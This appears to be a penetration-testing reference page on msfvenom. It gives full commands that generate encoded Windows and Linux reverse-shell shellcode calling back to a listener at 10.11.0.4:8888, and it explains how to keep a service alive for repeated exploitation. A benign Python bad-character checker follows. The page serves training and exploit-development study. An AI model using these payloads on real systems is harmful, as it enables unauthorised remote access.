msfvenom is the payload generator that ships with Metasploit. It produces payloads in many output formats (ELF, PE, raw shellcode, PowerShell, etc.) for binary exploitation, client-side attacks and other purposes.
Usage
msfvenom <options...>
- -p <payload> <options>: payload and its options, e.g. -p windows/shell_reverse_tcp LHOST=<local ip> LPORT=8888 EXITFUNC=thread (EXITFUNC=thread exits gracefully via ExitThread)
- -f <format>: payload output format, e.g. c or py for a styled string, exe / elf for a binary
- -v <varname>: variable name used in shellcode string output
- -e <encoder>: encoder for the payload, e.g. -e x86/shikata_ga_nai
- -i <iters>: number of encoding iterations
- -b <badchars>: bad characters the encoded payload must not contain, e.g. -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
- -x <embedfile>: file / executable to embed the payload into
Examples
Windows
This snippet is intended for a Windows buffer overflow in a threaded application (an HTTP or TCP service).
- Change LHOST IP address in the snippet
- Start listener / handler on 8888
Set EXITFUNC on threaded servers/applications!
EXITFUNC=thread makes the payload terminate only the thread it runs in (ExitThread), so the same service instance can be exploited again. Without it, the service crashes after the first exploitation attempt.
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
Linux
This snippet generates a generic reverse shell shellcode in Python (e.g. for exploit development).
- Change LHOST IP
- Start listener on 8888.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 -b "\x00\x20" -f py -v shellcode
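Before using output produced with -f py and -b, it is worth verifying that the encoder really kept every bad character out of the result. The script below is an added example, not part of the original page and not Metasploit code. It assumes the line layout that -f py -v <varname> output uses (a first line assigning b"" to the variable, followed by += lines of \x-escaped bytes); the sample text and its bytes are constructed filler for the demonstration, not real generator output.

```python
import re

# Constructed sample in the layout of "msfvenom -f py -v shellcode" output.
# The byte values are arbitrary filler chosen for this example; one of them
# (\x0a) is deliberately a bad character so the check has something to report.
SAMPLE_OUTPUT = '''shellcode =  b""
shellcode += b"\\x90\\x90\\x41\\x42\\x43\\x44"
shellcode += b"\\x45\\x46\\x47\\x48\\x0a\\x49"
'''

# Bad-character list taken from the Windows example on this page.
BADCHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"

# Matches both the initial assignment (name = b"") and the += continuation lines.
LINE_RE = re.compile(r'^(\w+)\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_py_output(text):
    """Parse -f py style text; return (variable name, payload bytes)."""
    varname = None
    buf = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised line: {line!r}")
        name, escaped = m.groups()
        if varname is None:
            varname = name
        elif name != varname:
            raise ValueError(f"variable changed from {varname} to {name}")
        # "\x90\x41" -> "9041" -> b"\x90\x41"
        buf += bytes.fromhex(escaped.replace("\\x", ""))
    return varname, bytes(buf)


def find_badchars(payload, badchars):
    """Return (offset, value) for every byte of payload that is in badchars."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


if __name__ == "__main__":
    name, payload = parse_py_output(SAMPLE_OUTPUT)
    hits = find_badchars(payload, BADCHARS)
    print(f"{name}: {len(payload)} bytes")
    for offset, value in hits:
        print(f"  bad char 0x{value:02x} at offset {offset}")
    if not hits:
        print("  no bad characters found")
```

Run it against the real file produced by the commands above (replace SAMPLE_OUTPUT with the file contents); any hit means the encoder did not succeed for that bad-character list and the -e / -i options or the list itself need adjusting before the output is used.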